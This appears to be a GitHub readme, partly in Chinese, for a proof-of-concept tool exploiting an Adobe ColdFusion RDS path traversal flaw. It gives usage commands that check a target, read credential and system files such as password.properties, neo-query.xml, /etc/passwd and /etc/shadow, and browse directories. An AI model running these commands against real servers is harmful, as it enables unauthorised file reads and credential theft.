imbas007/CVE-2026-48282
GitHub: imbas007/CVE-2026-48282
针对 Adobe ColdFusion RDS 路径遍历漏洞(CVE-2026-48282)的 PoC 利用工具,支持漏洞检测、任意文件读取和目录浏览。
Stars: 20 | Forks: 5
# CVE-2026-48282-POC
**CVE-2026-48282** 是 **Adobe ColdFusion 的 Remote Development Service (RDS)** 中的一个**路径遍历**漏洞,其 CVSS 评分为 **10.0(严重)**。它允许未经身份验证的攻击者通过 `/CFIDE/main/ide.cfm` endpoint 读取和写入任意文件,从而导致**远程代码执行 (RCE)**。
## 安装说明
```
# Clone the repository
git clone https://github.com//CVE-2026-48282.git
cd CVE-2026-48282
# 安装 dependencies(仅需要 `requests`)
pip install -r requirements.txt
```
# 使用方法
### 步骤 1 — 检查目标是否存在漏洞
```
python cve-2026-48282.py -t http://target.com --check
```
```
### 步骤 2 — 读取敏感文件
Once confirmed vulnerable, extract credentials and configuration:
```bash
# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"
# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"
# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow
# 保存输出到文件
python cve-2026-48282.py -t http://target.com --read "C:\\boot.ini" -o boot.ini
```
### 步骤 3 — 浏览目录
```
# 列出 root directory
python cve-2026-48282.py -t http://target.com --browse "C:\\"
```
标签:CISA项目, HTTP工具, PoC, Python, 无后门, 暴力破解, 网络安全审计, 路径遍历, 逆向工具